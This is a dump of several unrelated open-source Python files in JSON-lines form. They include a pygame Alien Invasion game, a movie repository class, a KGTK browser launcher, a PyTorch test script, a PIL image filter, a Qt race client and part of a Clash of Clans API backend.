rotated_boxes[:, 4] = np.arctan2(scale_factor_x * s, scale_factor_y * c) * 180 / np.pi\n\n return rotated_boxes\n\n\nHFlipTransform.register_type(\"rotated_box\", HFlip_rotated_box)\nResizeTransform.register_type(\"rotated_box\", Resize_rotated_box)\nNoOpTransform.register_type(\"rotated_box\", lambda t, x: x)\n","repo_name":"dmlc/gluon-cv","sub_path":"gluoncv/torch/data/transforms/instance_transforms/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":38605,"program_lang":"python","lang":"en","doc_type":"code","stars":5662,"dataset":"github-code","pt":"54"} +{"seq_id":"41870588451","text":"import sys\r\n\r\nfrom time import sleep\r\n\r\nimport pygame\r\nfrom bullet import Bullet\r\nfrom alien import Alien\r\n\r\n\r\ndef check_events(score,ai_settings, screen, ship, bullets, stats, play_button,aliens):\r\n '''响应按键和鼠标事件'''\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.KEYDOWN:\r\n check_keydown_events(event, ai_settings, screen, ship, bullets, aliens, stats,score)\r\n elif event.type == pygame.KEYUP:\r\n check_keyup_events(event,ship)\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n check_play_button(score,stats, play_button, mouse_x, mouse_y,\r\n ai_settings,screen,aliens, ship,bullets)\r\n\r\ndef check_keydown_events(event, ai_settings, screen, ship, bullets, aliens, stats,score):\r\n '''响应按键'''\r\n if event.key == pygame.K_RIGHT:\r\n ship.moving_right = 1\r\n elif event.key == pygame.K_LEFT:\r\n ship.moving_left = 1\r\n elif event.key == pygame.K_SPACE:\r\n fire_bullet(ai_settings, screen, ship, bullets)\r\n elif event.key == pygame.K_ESCAPE :\r\n sys.exit()\r\n elif event.key == pygame.K_p: #游戏开始,初始化代码拷贝自check_playbutton\r\n start_game(stats,ai_settings,screen, aliens, ship,bullets)\r\n # 重置游戏设置\r\n ai_settings.initialize_dynamic_settings()\r\n stats.reset_stats()\r\n\r\n # 显示记分板类里的属性,最高分,等级,当前分数,剩余飞船数目\r\n score.prep_high_score()\r\n score.prep_level()\r\n score.prep_score()\r\n score.prep_ships()\r\n\r\ndef check_keyup_events(event,ship):\r\n '''响应松开'''\r\n if event.key == pygame.K_RIGHT:\r\n ship.moving_right = 0\r\n elif event.key == pygame.K_LEFT:\r\n ship.moving_left = 0\r\n\r\ndef check_play_button(score,stats, play_button, mouse_x, mouse_y,\r\n ai_settings,screen, aliens, ship,bullets):\r\n '''单击play按钮时启动游戏'''\r\n if play_button.rect.collidepoint(mouse_x, mouse_y) and not stats.game_active :\r\n start_game(stats,ai_settings,screen, aliens, ship,bullets)\r\n #重置游戏设置\r\n ai_settings.initialize_dynamic_settings()\r\n stats.reset_stats()\r\n\r\n #显示记分板类里的属性,最高分,等级,当前分数,剩余飞船数目\r\n score.prep_high_score()\r\n score.prep_level()\r\n score.prep_score()\r\n score.prep_ships()\r\n\r\ndef start_game(stats,ai_settings,screen, aliens, ship,bullets):\r\n pygame.mouse.set_visible(0)\r\n stats.game_active = 1\r\n bullets.empty()\r\n aliens.empty()\r\n # 重新生成外星人并重置飞船位置\r\n creat_fleet(ai_settings, screen, aliens, ship)\r\n ship.center_ship()\r\n # Pause\r\n sleep(0.5)\r\n stats.reset_stats()\r\n\r\ndef screen_update(ai_settings, screen, ship, aliens, bullets, stats, play_button, score):\r\n '''更新屏幕上图像,并切换到新屏幕'''\r\n #每次循环重绘屏幕\r\n screen.fill(ai_settings.bg_color)\r\n\r\n if stats.game_active:\r\n for bullet in bullets.sprites():\r\n bullet.draw_bullet()\r\n\r\n ship.blitme()\r\n aliens.draw(screen)\r\n score.show_score()\r\n\r\n if not stats.game_active:\r\n play_button.draw_button()\r\n\r\n #让最近绘制的屏幕可见\r\n pygame.display.flip()\r\n\r\ndef bullets_update(bullets,aliens,ai_settings, screen, ship, stats, score):\r\n '''更新子弹位置,并删除消失子弹'''\r\n #更新子弹\r\n bullets.update()\r\n # 删除消失的子弹\r\n for bullet in bullets.copy():\r\n if bullet.rect.bottom <= 0:\r\n bullets.remove(bullet)\r\n check_collisions(ai_settings, screen, aliens, bullets, ship, stats, score)\r\n\r\ndef check_collisions(ai_settings, screen, aliens, bullets, ship, stats, score):\r\n '''检测子弹与外星人的碰撞'''\r\n #检测是否有子弹击中外星人\r\n #删除碰撞的子弹与外星人\r\n collisions = pygame.sprite.groupcollide(bullets, aliens, 1, 1)\r\n if collisions :\r\n #当一个子弹与多个外星人碰撞时,可以正确计分\r\n for aliens in collisions.values():\r\n stats.score += ai_settings.alien_points * len(aliens)\r\n score.prep_score()\r\n check_high_score(stats, score)\r\n #检查外星人编组是否为空,是的话调用create重新生成\r\n if len(aliens) == 0:\r\n bullets.empty()\r\n #当消灭所有外星人后,等级提高1\r\n stats.level += 1\r\n score.prep_level()\r\n\r\n creat_fleet(ai_settings, screen, aliens, ship)\r\n ai_settings.increase_speed()\r\n\r\n\r\ndef fire_bullet(ai_settings, screen, ship, bullets):\r\n # 子弹数目小于设置的值时,创建子弹并将其添加在编组中\r\n if len(bullets) < ai_settings.bullets_allowed:\r\n new_bullet = Bullet(ai_settings, screen, ship)\r\n bullets.add(new_bullet)\r\n\r\n\r\ndef create_alien(ai_settings,screen,aliens,alien_number, row_number):\r\n alien = Alien(ai_settings, screen)\r\n alien_width = alien.rect.width\r\n alien.x = alien_width + 2 * alien_width * alien_number\r\n alien.rect.x = alien.x\r\n alien.rect.y = alien.rect.height + 2*alien.rect.height*row_number\r\n aliens.add(alien)\r\n\r\ndef creat_fleet(ai_settings, screen, aliens, ship):\r\n '''创建外星人群'''\r\n alien = Alien(ai_settings, screen)\r\n number_aliens_x = get_number_aliens_x(ai_settings, alien.rect.width)\r\n number_rows = get_number_rows(ai_settings, ship.rect.height, alien.rect.height, )\r\n #Creat aliens on the first line\r\n for row_number in range(number_rows):\r\n for alien_number in range(number_aliens_x):\r\n #Creat a new alien and put it in the line\r\n create_alien(ai_settings,screen,aliens,alien_number,row_number)\r\n\r\ndef get_number_aliens_x(ai_settings, alien_width):\r\n '''计算每行可容纳的外星人数量'''\r\n # 外星人之间的间距等于其宽度\r\n avaliable_space_x = ai_settings.screen_width - 2 * alien_width\r\n number_aliens_x = int(avaliable_space_x / alien_width / 2)\r\n return number_aliens_x\r\n\r\ndef get_number_rows(ai_settings, ship_height, alien_height, ):\r\n '''计算每行可容纳的外星人数量'''\r\n # 外星人之间的间距等于其宽度\r\n avaliable_space_y = ai_settings.screen_height - 3 * alien_height - ship_height\r\n number_rows = int(avaliable_space_y / alien_height / 2)\r\n return number_rows\r\n\r\ndef check_fleet_edges(ai_settings, aliens):\r\n \"\"\"有外星人到达边缘时采取相应的措施\"\"\"\r\n for alien in aliens.sprites():\r\n if alien.check_edges():\r\n change_fleet_direction(ai_settings, aliens)\r\n break\r\n\r\ndef change_fleet_direction(ai_settings, aliens):\r\n \"\"\"将整群外星人下移,并改变它们的方向\"\"\"\r\n for alien in aliens.sprites():\r\n alien.rect.y += ai_settings.fleet_drop_speed\r\n ai_settings.fleet_direction *= -1\r\n\r\ndef check_aliens_bottom( ai_settings,aliens, ship, screen,stats,bullets,score):\r\n '''检查是否有外星人到达屏幕底端'''\r\n for alien in aliens.sprites():\r\n screen_rect = screen.get_rect()\r\n if alien.rect.bottom >= screen_rect.bottom:\r\n #与撞击飞船时处理相同\r\n ship_hit(ai_settings,aliens, ship, screen,stats,bullets,score)\r\n break\r\n\r\ndef aliens_update(ai_settings,aliens, ship, screen,stats,bullets,score):\r\n \"\"\"\r\n 检查是否有外星人位于屏幕边缘,并更新整群外星人的位置\r\n \"\"\"\r\n # 更新外星人\r\n check_fleet_edges(ai_settings, aliens,)\r\n aliens.update()\r\n #检测外星人与飞船的collision\r\n if pygame.sprite.spritecollideany(ship,aliens):\r\n ship_hit(ai_settings,aliens, ship, screen,stats,bullets, score)\r\n #检查外星人是否到达屏幕底端\r\n check_aliens_bottom(ai_settings,aliens, ship, screen,stats,bullets,score)\r\n\r\ndef ship_hit(ai_settings,aliens, ship, screen,stats,bullets, score):\r\n '''响应外星人与飞船的碰撞'''\r\n\r\n #飞船剩余数目减1\r\n if stats.ship_left > 1:\r\n stats.ship_left -= 1\r\n score.prep_ships()\r\n #清空子弹与外星人\r\n bullets.empty()\r\n aliens.empty()\r\n #重新生成外星人并重置飞船位置\r\n creat_fleet(ai_settings, screen, aliens, ship)\r\n ship.center_ship()\r\n #Pause\r\n sleep(0.5)\r\n else:\r\n stats.game_active = 0\r\n pygame.mouse.set_visible(1)\r\n\r\ndef check_high_score(stats, score):\r\n '''检查最高分'''\r\n with open('high_score.txt','r+') as f:\r\n if stats.score > stats.high_score:\r\n stats.high_score = stats.score\r\n f.write(str(stats.high_score))\r\n score.prep_high_score()\r\n","repo_name":"prmsvion/alien_invasions","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":8856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25986582241","text":"import movie\nimport json\n\n\nclass MovieRepository:\n def __init__(self):\n with open('movies.json', 'r') as f:\n self.movies = json.JSONDecoder(object_hook=movie.from_json).decode(f.read())\n\n def get_all(self):\n return self.movies\n\n def get(self, movie_id):\n return list(filter(lambda x: x.id == movie_id, self.movies))\n\n def add(self, movie_object):\n if isinstance(movie_object, list):\n last_id = max(self.movies).id + 1\n for _movie in movie_object:\n _movie.id = last_id\n self.movies.append(movie.Movie(_movie.id, _movie.title, _movie.year, _movie.actors, _movie.director))\n last_id += 1\n else:\n movie_object.id = max(self.movies).id + 1\n self.movies.append(movie.Movie(movie_object.id, movie_object.title, movie_object.year, movie_object.actors,\n movie_object.director))\n\n with open('movies.json', 'w') as f:\n json.dump(self.movies, f, cls=movie.MovieEncoder)\n\n return movie_object\n\n def remove(self, movie_id):\n self.movies = list(filter(lambda x: x.id != movie_id, self.movies))\n\n with open('movies.json', 'w') as f:\n json.dump(self.movies, f, cls=movie.MovieEncoder)\n\n def remove_all(self):\n self.movies = []\n\n with open('movies.json', 'w') as f:\n json.dump(self.movies, f, cls=movie.MovieEncoder)\n\n def replace(self, movie_id, movie_object):\n found_movie = next((_movie for _movie in self.movies if _movie.id == movie_id), None)\n\n if found_movie:\n movie_object.id = movie_id\n self.movies.remove(found_movie)\n self.movies.append(movie_object)\n\n with open('movies.json', 'w') as f:\n json.dump(self.movies, f, cls=movie.MovieEncoder)\n else:\n self.add(movie_object)\n\n def replace_all(self, new_movies):\n self.movies = new_movies\n\n for i in range(1, len(self.movies) + 1):\n self.movies[i - 1].id = i\n\n with open('movies.json', 'w') as f:\n json.dump(self.movies, f, cls=movie.MovieEncoder)\n\n return self.movies\n\n\nif __name__ == '__main__':\n repo = MovieRepository()\n print(repo.get(2))\n","repo_name":"eduard-tuduri/Cloud-Computing","sub_path":"Homeworks/Homework 2/movie_repository.py","file_name":"movie_repository.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74226683682","text":"import os\nimport pathlib\n\nimport click\nimport numpy as np\nimport pandas as pd\nimport pyarrow as pa\nimport pyarrow.dataset as ds\nimport pyarrow.parquet as pq\n\nfrom radcompressor import thermo\n\n\nparameters = {\"T_range\": [170, 400], \"Pr\": [1, 100]} # K\n\nparameters_narrow = {\"m_in\": [0.15, 0.25], \"mach_tip\": [0.35, 0.7]}\n\nparameters_wide = {\"m_in\": [5e-2, 0.7], \"mach_tip\": [5e-2, 2.5]}\n\n\n@click.command()\n@click.option(\"--geometries\", \"-g\", type=click.Path(exists=True, dir_okay=False))\n@click.option(\n \"--output\",\n type=click.Path(file_okay=False),\n default=\"data\",\n help=\"Folder where dataset subfolders will be created\",\n)\n@click.option(\"--output-row-size\", default=5000)\n@click.option(\"--fluid\", \"-f\", \"fluid_list\", type=str, required=True, multiple=True)\n@click.option(\n \"--fluid-type\", type=click.Choice([\"coolprop\", \"refprop\"]), default=\"coolprop\"\n)\n@click.option(\"--batch-size\", \"-b\", default=20000)\n@click.option(\n \"--n-points\", \"-no\", default=10, help=\"Number of operating points (Mf, Nrot)\"\n)\n@click.option(\n \"--n-inlet\", \"-ni\", default=10, help=\"Number of inlet conditions (Pin, Tin)\"\n)\n@click.option(\"--narrow/--wide\", default=False)\ndef main(\n geometries,\n output,\n output_row_size,\n fluid_list,\n fluid_type,\n batch_size,\n n_points,\n n_inlet,\n narrow,\n):\n \"\"\"Sample conditions for the provided geometries\"\"\"\n # Set bounds\n if narrow:\n parameters.update(parameters_narrow)\n else:\n parameters.update(parameters_wide)\n # Prepare fluid and load to check if it exists\n if fluid_type == \"coolprop\":\n fld = {f: thermo.CoolPropFluid(f) for f in fluid_list}\n elif fluid_type == \"refprop\":\n fld = {f: thermo.RefpropFluid(f) for f in fluid_list}\n\n # Prepare rng\n rng = np.random.default_rng()\n\n geometries = pathlib.Path(geometries)\n output_subfolder = pathlib.Path(output) / (\n os.path.splitext(geometries.parts[-1])[0] + \"_tabular\"\n )\n output_subfolder.mkdir(exist_ok=True)\n\n geom_ds = ds.dataset(geometries)\n\n idx_offset = 0\n\n for b in geom_ds.to_batches(batch_size=batch_size, columns=[\"geom_id\"]):\n geom_idx = b.to_pandas().index\n n_geom = len(geom_idx)\n\n fluids = rng.choice(fluid_list, size=n_geom * n_inlet, replace=True)\n T_triple, T_max, T_crit, P_crit = np.array(\n [\n [fld[f].T_triple, fld[f].T_max, fld[f].T_crit, fld[f].P_crit]\n for f in fluids\n ]\n ).T\n T_low = np.maximum(T_triple + 30, parameters[\"T_range\"][0])\n T_high = np.minimum(T_max - 50, parameters[\"T_range\"][1])\n\n Teff = rng.uniform(low=T_low, high=T_high, size=n_geom * n_inlet)\n\n Pmax = P_crit * (Teff > T_crit)\n Pmax[Pmax == 0] = [\n fld[f].thermo_prop(\"TQ\", t, 1).P - 1.1e-4\n for t, f in zip(Teff[Pmax == 0], fluids[Pmax == 0])\n ]\n # 1.1e-4 added to avoid Coolprop issues\n\n Pmax[Pmax > P_crit / 3] = P_crit[Pmax > P_crit / 3] / 3\n\n Peff_r = parameters[\"Pr\"][0] + (1 - rng.power(5, len(Teff))) * (\n parameters[\"Pr\"][1] - parameters[\"Pr\"][0]\n )\n Peff = Pmax / Peff_r\n\n # Validate that each condition is valid\n [\n fld[f].thermo_prop(\"PT\", p, t).P - 1.1e-4\n for t, f, p in zip(Teff, fluids, Peff)\n ]\n\n m_in = rng.uniform(\n low=parameters[\"m_in\"][0],\n high=parameters[\"m_in\"][1],\n size=n_geom * n_inlet * n_points,\n )\n mach_tip = rng.uniform(\n low=parameters[\"mach_tip\"][0],\n high=parameters[\"mach_tip\"][1],\n size=n_geom * n_inlet * n_points,\n )\n\n df = pd.DataFrame(\n {\n \"geom_id\": geom_idx.repeat(n_inlet * n_points),\n \"fluid\": fluids.repeat(n_points),\n \"in_T\": Teff.repeat(n_points),\n \"in_P\": Peff.repeat(n_points),\n \"in_m_in0\": m_in,\n \"in_mach_tip\": mach_tip,\n }\n )\n df.index.name = \"cond_id\"\n\n df.index += idx_offset\n idx_offset = df.index.max() + 1\n\n table = pa.Table.from_pandas(df, preserve_index=True)\n table_name = (\n output_subfolder / f\"data_{geom_idx.min()}-{geom_idx.max()}.parquet\"\n )\n pq.write_table(table, table_name, row_group_size=output_row_size)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cyrilpic/radcomp","sub_path":"scripts/sample_conditions.py","file_name":"sample_conditions.py","file_ext":"py","file_size_in_byte":4432,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"30681060075","text":"\"\"\"\nRun the KGTK-Browser Flask server\nOpen a browser window with the kgtk-browser location\n\nOptional params:\n - hostname (--host)\n - port number (-p, --port)\n - kgtk browser config file (-c, --config)\n - kgtk browser flask app file (-a, --app)\n\nExample usage:\n kgtk browser --host 0.0.0.0 --port 1234 --app flask_app.py --config config.py\n\"\"\"\n\nfrom argparse import Namespace, SUPPRESS\n\nfrom kgtk.cli_argparse import KGTKArgumentParser, KGTKFiles\n\n# Define the name of the command and its alias.\nBROWSER_COMMAND: str = \"browser\"\nBROWSE_COMMAND: str = \"browse\"\n\n\ndef parser():\n return {\n 'aliases': [BROWSE_COMMAND],\n 'help': 'Run the KGTK-Browser Flask app.',\n 'description': 'Open a new browser with the KGTK-Browser app running.',\n }\n\n\ndef add_arguments_extended(parser: KGTKArgumentParser, parsed_shared_args: Namespace):\n \"\"\"\n Parse arguments\n Args:\n parser (argparse.ArgumentParser)\n \"\"\"\n from kgtk.utils.argparsehelpers import optional_bool\n\n # These special shared aruments inticate whether the `--expert` option\n # was supplied and the command name that was used.\n _expert: bool = parsed_shared_args._expert\n _command: str = parsed_shared_args._command\n\n # This helper function makes it easy to suppress options from\n # The help message. The options are still there, and initialize\n # what they need to initialize.\n def h(msg: str) -> str:\n if _expert:\n return msg\n else:\n return SUPPRESS\n\n # KGTK Browser hostname\n parser.add_argument(\n '--host',\n dest=\"kgtk_browser_host\",\n help=\"Hostname used to launch flask server, defaults to localhost\",\n default=\"localhost\",\n )\n\n # KGTK Browser port number\n parser.add_argument(\n '-p', '--port',\n dest=\"kgtk_browser_port\",\n help=\"Port number used to launch flask server, defaults to 5000\",\n default=\"5000\",\n )\n\n # KGTK Browser configuration file\n parser.add_argument(\n '-c', '--config',\n dest=\"kgtk_browser_config\",\n help=\"KGTK Browser configuration file, defaults to `kgtk_browser_config.py`\",\n default=\"kgtk_browser_config.py\",\n )\n\n # KGTK Browser application file\n parser.add_argument(\n '-a', '--app',\n dest=\"kgtk_browser_app\",\n help=\"KGTK Browser flask application file, defaults to `kgtk_browser_app.py`\",\n default=\"kgtk_browser_app.py\",\n )\n\n\ndef run(\n kgtk_browser_host: str = '0.0.0.0',\n kgtk_browser_port: str = '5000',\n kgtk_browser_config: str = 'kgtk_browser_config.py',\n kgtk_browser_app: str = 'kgtk_browser_app.py',\n\n errors_to_stdout: bool = False,\n errors_to_stderr: bool = True,\n show_options: bool = False,\n verbose: bool = False,\n very_verbose: bool = False,\n\n **kwargs # Whatever KgtkFileOptions and KgtkValueOptions want.\n) -> int:\n # import modules locally\n from pathlib import Path\n import simplejson as json\n import webbrowser\n import threading\n import os, sys\n import typing\n\n from kgtk.exceptions import KGTKException\n\n # Select where to send error messages, defaulting to stderr.\n error_file: typing.TextIO = sys.stdout if errors_to_stdout else sys.stderr\n\n try:\n\n # Set the flask app and configuration file settings\n os.environ[\"FLASK_APP\"] = kgtk_browser_app\n os.environ[\"KGTK_BROWSER_CONFIG\"] = kgtk_browser_config\n\n # Open the default web browser at the kgtk-browser location\n url = \"http://{}:{}/browser\".format(kgtk_browser_host, kgtk_browser_port)\n threading.Timer(2.5, lambda: webbrowser.open(url)).start()\n\n # Run flask app using the selected host and port\n os.system(\n \"flask run --host {} --port {}\".format(\n kgtk_browser_host,\n kgtk_browser_port,\n )\n )\n\n return 0\n\n except SystemExit as e:\n raise KGTKException(\"Exit requested\")\n except Exception as e:\n raise KGTKException(str(e))\n","repo_name":"usc-isi-i2/kgtk-browser","sub_path":"kgtk_extensions/cli/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"26109935006","text":"# coding: utf-8\r\nimport os\r\nimport time\r\nimport torch\r\nfrom torch import nn\r\nimport torch.nn.functional as F\r\nfrom torch.utils.data import DataLoader\r\nfrom _segclsDataReader import SCdataset\r\nfrom torchvision import models, transforms\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nfrom _utils import *\r\n\r\n\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\ntorch.manual_seed(3)\r\nnp.random.seed(3)\r\ntorch.cuda.manual_seed(3)\r\n\r\n#%% #######################hyparameter\r\nnormMean = [0.787, 0.5723, 0.769]\r\nnormStd = [0.1193, 0.1878, 0.0974]\r\ntestpath = '../data/test.txt'\r\nbatch_size = 150\r\nnum_worker = 8\r\n\r\nnum_class = 2\r\n\r\n\r\ndef deTransform(mean, std, tensor):\r\n mean = torch.as_tensor(mean, dtype=torch.float32, device=tensor.device)\r\n std = torch.as_tensor(std, dtype=torch.float32, device=tensor.device)\r\n tensor.mul_(std[:, None, None]).add_(mean[:, None, None])\r\n return tensor\r\n\r\nstart = time.time()\r\n####################### transformer defination, dataset reader and loader\r\npreprocess = transforms.Compose([\r\n # transforms.RandomChoice([transforms.RandomHorizontalFlip(p=1),\r\n # transforms.RandomVerticalFlip(p=1)]), # randomly select one for process\r\n transforms.ToTensor(), # preprocess was operated on original image, will rewrite on previous transform.\r\n transforms.Normalize(normMean, normStd)])\r\n\r\ntestset = SCdataset(testpath, preprocess)\r\ntestloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=num_worker)\r\n\r\nnet = models.resnet34(pretrained=False, num_classes=num_class).cuda() # num_class is 10\r\nnet.load_state_dict(torch.load('../model/epoch_45.pkl')) # load the finetune weight parameters\r\n\r\ncorrect = 0\r\npredictions = np.array([])\r\nreal = np.array([])\r\nscore = np.array([])\r\nnet.eval()\r\nwith torch.no_grad():\r\n for i, (img, target) in tqdm(enumerate(testloader)):\r\n target = target.cuda().long()\r\n prob = F.softmax(net(img.cuda()), 1, _stacklevel=5)\r\n prediction = torch.argmax(prob, dim=1)\r\n correct += (prediction == target).sum().item()\r\n\r\n predictions = np.concatenate((predictions, prediction.cpu().numpy()), axis=0)\r\n real = np.concatenate((real, target.cpu().numpy()), axis=0)\r\n score = np.concatenate((score, np.array(prob[:, 1].cpu())), axis=0)\r\n\r\nAcc = correct * 1.0 / testset.__len__()\r\nprint('---ACC{:.4f}---epoch{:.4f}---epoch{:.4f}---'.format(Acc, 1, 1))\r\n\r\nShowConfusionMatrix(real, predictions)\r\nROCAUC(real, score)\r\nprint(time.time()-start)\r\n##\r\n# nn.ModuleList\r\n# nn.ReLU\r\n","repo_name":"gatsby2016/DLforWSI","sub_path":"codes/5_test.py","file_name":"5_test.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"23829425511","text":"# filter.py\n# https://stackoverflow.com/questions/9701515/filter-part-of-image-using-pil-python\n\n# IMPORTS\nimport sys, imghdr, colorsys\nfrom PIL import Image, ImageDraw, ImageFont, ImageOps, ImageFilter\n\n# SIMPLIFYING SYS.ARGV\ndef commandCall(argNum):\n return sys.argv[int(argNum)]\n\nbaseImg = Image.open(commandCall(1))\nbaseStr = commandCall(1)\nacceptList = [\"png\",\"jpeg\",\"jpg\"]\n\nif not ( (imghdr.what(baseStr)) in acceptList):\n print(\"Invalid image format.\")\n quit()\nelse:\n print(\"Acceptable image format. Continuing...\")\n\nbaseImg.save('basePNG.png','PNG')\nbasePNG = Image.open('basePNG.png')\n\n# basePNG.show()\n\nmodifyA = basePNG.filter(ImageFilter.MedianFilter(5))\n# modifyA.show()\n\nwidth, height = basePNG.size\n\n\"\"\"\nbaseForCrop = Image.open('basePNG.png')\nbox = (0,0,int(width*(2/3)),int(height*(2/3)))\nBcrop1 = basePNG.crop(box)\nBcropEd = Bcrop1.filter(ImageFilter.MedianFilter(15))\nbaseForCrop.paste(BcropEd, box)\nmodifyB = baseForCrop\n# modifyB.show()\n\"\"\"\n\nbaseHSV = basePNG.convert('HSV')\n# baseHSV.show()\n\n\n\nmodifyC = baseHSV\nmodifyD = modifyC\n\nbaseLoaded = basePNG.load()\n\n\"\"\"\nfor y in range(basePNG.size[1]):\n for x in range(basePNG.size[0]):\n color = tuple(baseLoaded[x, y])\n h, s, v = colorsys.rgb_to_hsv(color[0],color[1],color[2])\n h = h\n s = s * 0.8\n v = v * 0.9\n r, g, b = colorsys.hsv_to_rgb(h,s,v)\n modifyD.putpixel( (x,y), (int(r+200),int(g),int(b+200)) )\n\nmodifyD = modifyD.filter(ImageFilter.SMOOTH)\nmodifyD.show()\n\"\"\"\n\n\nfor y in range(basePNG.size[1]):\n for x in range(basePNG.size[0]):\n color = tuple(baseLoaded[x, y])\n h, s, v = colorsys.rgb_to_hsv(color[0],color[1],color[2])\n h = h\n s = s * 0.8\n v = v * 0.9\n r, g, b = colorsys.hsv_to_rgb(h,s,v)\n modifyC.putpixel( (x,y), (int(r),int(abs(g-10)),int(b)) )\n\nmodifyC = modifyC.filter(ImageFilter.SMOOTH)\nmodifyC = modifyC.convert('RGB')\nmodifyC.save('finalFiltered.png','PNG')\nmodifyC.show()\n\n\n","repo_name":"theKyrgyz/SublimeTextCS550","sub_path":"ImageFilter/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42628210879","text":"# This Python file uses the following encoding: utf-8\nimport sys\nimport os\nimport socket\nimport threading\nimport time\nimport censusname # `sudo pip install censusname`\n\nfrom PySide2.QtGui import QGuiApplication\nfrom PySide2.QtQml import QQmlApplicationEngine\nfrom PySide2.QtCore import QObject, Signal\n\nHOST = '127.0.0.1' # The server's hostname or IP address\nPORT = 2468 # The default port used by the server\n\n\nclass Receiver(QObject):\n\n msg_number = 0\n raceData = Signal(str, float, int, int, arguments=['name', 'elapsed', 'id', 'gate'])\n\n def handle_race_data(self):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n\n except socket.error as e:\n print(\"Failed to create socket: \" + str(e))\n sys.exit(-1)\n\n # keep trying every 5 seconds to connect to server until server is running\n while True:\n try:\n s.connect((HOST, PORT))\n print(\"Socket connected to server \" + HOST + \" port: \" + str(PORT))\n s.sendall(b'start')\n break\n\n except socket.error as e:\n print(\"Failed to connect to server: \" + str(e) + \" - make sure it's running.\")\n time.sleep(5)\n\n while True:\n self.msg_number += 1\n s.sendall(bytes(str(self.msg_number), 'utf-8')) # you need to send at least 1 byte to get next message\n data = s.recv(1024)\n if (data == b'None'):\n print('......No more data is coming. Exiting.')\n exit(0)\n data = data.decode('utf-8').translate({ord(i): None for i in ' ()'}).split(',')\n self.raceData.emit(censusname.generate(), float(data[0]), int(data[1]), int(data[2]))\n\ndef run():\n app = QGuiApplication(sys.argv)\n engine = QQmlApplicationEngine()\n\n myReceiver = Receiver()\n engine.rootContext().setContextProperty(\"Receiver\", myReceiver)\n engine.load(os.path.join(os.path.dirname(__file__), \"ImprobableRaceClient.qml\"))\n\n listeningThread = threading.Thread(target=myReceiver.handle_race_data, daemon=True)\n listeningThread.start()\n if not engine.rootObjects():\n sys.exit(-1)\n\n return app.exec_()\n\nif __name__ == \"__main__\":\n sys.exit(run())\n","repo_name":"pmoerschell/sharedQML","sub_path":"race/ImprobableRaceClient.py","file_name":"ImprobableRaceClient.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31137512665","text":"import motor.motor_asyncio\nfrom redis import asyncio as aioredis\nimport redis\nimport os\nimport re\nfrom dotenv import load_dotenv\nimport coc\nfrom pytz import utc\nfrom datetime import datetime, timedelta\nfrom expiring_dict import ExpiringDict\nimport io\nimport asyncio\nimport aiohttp\nfrom fastapi import HTTPException\nimport ujson\nfrom base64 import b64decode as base64_b64decode\nfrom json import loads as json_loads\nfrom slowapi import Limiter\nfrom slowapi.util import get_remote_address\n\n\nlimiter = Limiter(key_func=get_remote_address, key_style=\"endpoint\")\n\ndef dynamic_limit(key: str):\n if key in {\"::1\", \"65.108.77.253\", \"85.10.200.219\"}:\n return \"1000/second\"\n return \"30/second\"\n\nIMAGE_CACHE = ExpiringDict()\n\nload_dotenv()\nclient = motor.motor_asyncio.AsyncIOMotorClient(os.getenv(\"LOOPER_DB_LOGIN\"))\nother_client = motor.motor_asyncio.AsyncIOMotorClient(os.getenv(\"DB_LOGIN\"))\nredis = aioredis.Redis(host='85.10.200.219', port=6379, db=0, password=os.getenv(\"REDIS_PW\"), retry_on_timeout=True, max_connections=25, retry_on_error=[redis.ConnectionError])\ncoc_client = coc.Client(key_count=100, key_names=\"DiscordBot\", throttle_limit=500, cache_max_size=0, load_game_data=coc.LoadGameData(always=False), raw_attribute=True, stats_max_size=0)\n\n\nclass DBClient():\n def __init__(self):\n self.usafam = other_client.get_database(\"usafam\")\n self.clans_db = self.usafam.get_collection(\"clans\")\n self.server_db = self.usafam.server\n\n collection_class = self.clans_db.__class__\n\n self.server_db: collection_class = self.usafam.server\n self.clans_db: collection_class = self.usafam.get_collection(\"clans\")\n self.banlist: collection_class = self.usafam.banlist\n\n self.player_search: collection_class = other_client.usafam.player_search\n\n self.looper = client.looper\n self.new_looper = client.new_looper\n\n self.legend_rankings: collection_class = self.new_looper.legend_rankings\n self.war_logs_db: collection_class = self.looper.war_logs\n self.player_stats_db: collection_class = self.new_looper.player_stats\n self.attack_db: collection_class = self.looper.warhits\n self.player_leaderboard_db: collection_class = self.new_looper.leaderboard_db\n self.player_history: collection_class = self.new_looper.get_collection(\"player_history\")\n\n self.clan_cache_db: collection_class = self.new_looper.clan_cache\n self.clan_wars: collection_class = self.looper.clan_war\n self.legend_history: collection_class = self.looper.legend_history\n self.base_stats: collection_class = self.looper.base_stats\n self.capital: collection_class = self.looper.raid_weekends\n self.clan_stats: collection_class = self.new_looper.clan_stats\n self.rankings: collection_class = self.new_looper.rankings\n self.cwl_groups: collection_class = self.new_looper.cwl_group\n\n self.clan_history: collection_class = self.new_looper.clan_history\n self.clan_join_leave: collection_class = self.new_looper.clan_join_leave\n 